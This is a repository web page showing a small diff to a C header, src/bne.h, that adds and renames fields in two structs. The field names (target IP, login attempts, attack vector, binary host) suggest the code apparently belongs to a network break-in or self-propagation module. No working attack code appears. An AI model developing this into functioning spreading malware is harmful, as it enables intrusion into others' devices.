aboutsummaryrefslogtreecommitdiff
path: root/src/bne.h
diff options
context:
space:
mode:
Diffstat (limited to 'src/bne.h')
-rw-r--r--src/bne.h4
1 files changed, 3 insertions, 1 deletions
diff --git a/src/bne.h b/src/bne.h
index c1cdf36..a776f2b 100644
--- a/src/bne.h
+++ b/src/bne.h
@@ -56,6 +56,7 @@ struct prne_bne_param {
} cb;
void *cb_ctx;
const prne_rcb_param_t *rcb;
+ const uint8_t *org_id;
prne_ip_addr_t subject;
unsigned int login_attempt;
};
@@ -69,7 +70,8 @@ struct prne_bne_result {
int err;
prne_bne_vector_t vec;
prne_pack_rc_t prc;
- prne_arch_t arch;
+ prne_bin_host_t bin_host;
+ prne_bin_host_t bin_used;
bool ny_instance;
};